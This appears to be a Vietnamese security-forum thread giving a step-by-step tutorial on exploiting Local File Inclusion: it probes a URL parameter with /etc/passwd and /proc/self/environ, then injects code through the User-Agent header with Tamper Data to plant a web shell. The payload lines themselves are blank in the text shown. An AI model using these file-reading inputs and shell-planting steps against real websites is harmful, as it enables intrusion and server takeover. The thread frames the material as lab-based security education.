[Local File Inclusion] Shell Uploading

DDos

VIP Members
22/10/2013
524
2.191 bài viết
[Local File Inclusion] Shell Uploading
Yêu cầu:

Đầu tiên, kiểm tra nếu website có khả năng bị tổn thương
Ví dụ:
Trên URL của trình duyệt có dạng

http://www.site.com/index.php?filename=2

Chúng ta sẽ thay số '2' thành /etc/passwd

Và nó sẽ trở thành:

http://www.site.com/index.php?filename=etc/passwd


Nếu nó làm việc, nó sẽ pop-up một vài code và bạn sẽ nhìn thấy như hình dưới đây:

1490892973lfi.png

Tiếp theo, bạn thực hiện tương tự như bước trên nhưng thay etc/passwd thành

/proc/self/environ

Nếu nó làm việc và file tồn tại, bạn sẽ nhận được một vài thứ tương tự nhưng khác mã code ở hình trên.

Bây giờ, mở temper data, để làm điều này bấm F10
14908929733cc30c8dcfa268c457726ec0ec417f93.png

Khi temper data được mở, bạn sẽ thấy như hình dưới đây:

1490892973a51927e26847b363c65a9959d6169dd4.png

Click vào nút Start temper

1490892973853ba2956894a57438d3b8c1dffe0698.png

Khi Tamper được hoàn thành, bạn sẽ nhìn thấy một cửa sổ giống như hình:

149089297376fce75d5c9b019cab1f21f7f7993bba.png

Thay đổi User-Agent thành:


Và nó sẽ giống như hình:

1490892973fig01.gif

Bây giờ, chúng ta sẽ upload shell

Khởi chạy Tamper Data, và click Start tamper sau đó đi tới User Agent. Nhập mã dưới đây vào User agent field



Site bây giờ sẽ download shell của bạn. Bạn có thể xác định shell tại website/shell.php hoặc http://www.site.com/index.php?filename=shell.php
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: [Local File Inclusion] Shell Uploading

Site này có phải bị dính lỗi XSS không vậy chủ thớt?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [Local File Inclusion] Shell Uploading

nktung;10254 đã viết:
Site này có phải bị dính lỗi XSS không vậy chủ thớt?
Site này không nhé! Vì đây là site trong lab thôi, và phần này chỉ là lỗi LFI.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên